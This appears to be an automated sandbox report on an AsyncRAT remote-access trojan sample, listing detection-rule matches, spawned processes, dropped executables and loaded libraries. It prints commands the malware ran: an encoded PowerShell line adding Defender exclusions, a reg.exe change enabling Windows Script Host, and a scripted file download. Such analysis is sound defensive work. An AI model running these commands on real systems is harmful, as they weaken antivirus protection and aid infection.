Source: 0000000F.00000002.2027914076.00000000070E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000003.00000002.1722917882.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000003.00000002.1722917882.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000010.00000002.2101694396.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000010.00000002.2101694396.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000011.00000002.2121649452.000000000703C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: AppLaunch.exe PID: 7608, type: MEMORYSTR Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: Lxfrfbi.exe PID: 7936, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: AppLaunch.exe PID: 8084, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: AppLaunch.exe PID: 8084, type: MEMORYSTR Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: Lxfrfbi.exe PID: 8140, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: AppLaunch.exe PID: 7432, type: MEMORYSTR Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: classification engine Classification label: mal100.troj.evad.winEXE@23/17@0/1
Source: C:\Users\user\Desktop\Gm602axA2d.exe File created: C:\Users\user\AppData\Local\Vulvvmkewji.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7176:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7548:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Mutant created: \Sessions\1\BaseNamedObjects\Llg9a02PERRO
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03
Source: C:\Users\user\Desktop\Gm602axA2d.exe File created: C:\Users\user\AppData\Local\Temp\Office Installer.exe Jump to behavior
Source: Gm602axA2d.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Gm602axA2d.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Gm602axA2d.exe ReversingLabs: Detection: 76%
Source: Gm602axA2d.exe Virustotal: Detection: 60%
Source: C:\Users\user\Desktop\Gm602axA2d.exe Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown Process created: C:\Users\user\Desktop\Gm602axA2d.exe "C:\Users\user\Desktop\Gm602axA2d.exe"
Source: C:\Users\user\Desktop\Gm602axA2d.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAdgB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAdABkACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAcwBqACMAPgA="
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Gm602axA2d.exe Process created: C:\Users\user\AppData\Local\Vulvvmkewji.exe "C:\Users\user\AppData\Local\Vulvvmkewji.exe"
Source: C:\Users\user\Desktop\Gm602axA2d.exe Process created: C:\Users\user\AppData\Local\Temp\Office Installer.exe "C:\Users\user\AppData\Local\Temp\Office Installer.exe"
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Process created: C:\Windows\System32\reg.exe "reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings" /v "Enabled" /t REG_DWORD /d 1 /f
Source: C:\Windows\System32\reg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -nop -command "& { (New-Object Net.WebClient).DownloadFile('https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api/v2/C2RReleaseData', 'C:\Users\user\AppData\Local\Temp\files\ver.txt') }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Lxfrfbi.exe "C:\Users\user\AppData\Roaming\Lxfrfbi.exe"
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Lxfrfbi.exe "C:\Users\user\AppData\Roaming\Lxfrfbi.exe"
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
Source: C:\Users\user\Desktop\Gm602axA2d.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAdgB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAdABkACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAcwBqACMAPgA=" Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe Process created: C:\Users\user\AppData\Local\Vulvvmkewji.exe "C:\Users\user\AppData\Local\Vulvvmkewji.exe" Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe Process created: C:\Users\user\AppData\Local\Temp\Office Installer.exe "C:\Users\user\AppData\Local\Temp\Office Installer.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Process created: C:\Windows\System32\reg.exe "reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings" /v "Enabled" /t REG_DWORD /d 1 /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -nop -command "& { (New-Object Net.WebClient).DownloadFile('https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api/v2/C2RReleaseData', 'C:\Users\user\AppData\Local\Temp\files\ver.txt') }" Jump to behavior
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
Source: C:\Users\user\Desktop\Gm602axA2d.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: msftedit.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: windows.globalization.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: bcp47mrm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: globinputhost.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: cryptbase.dll Jump to behavior
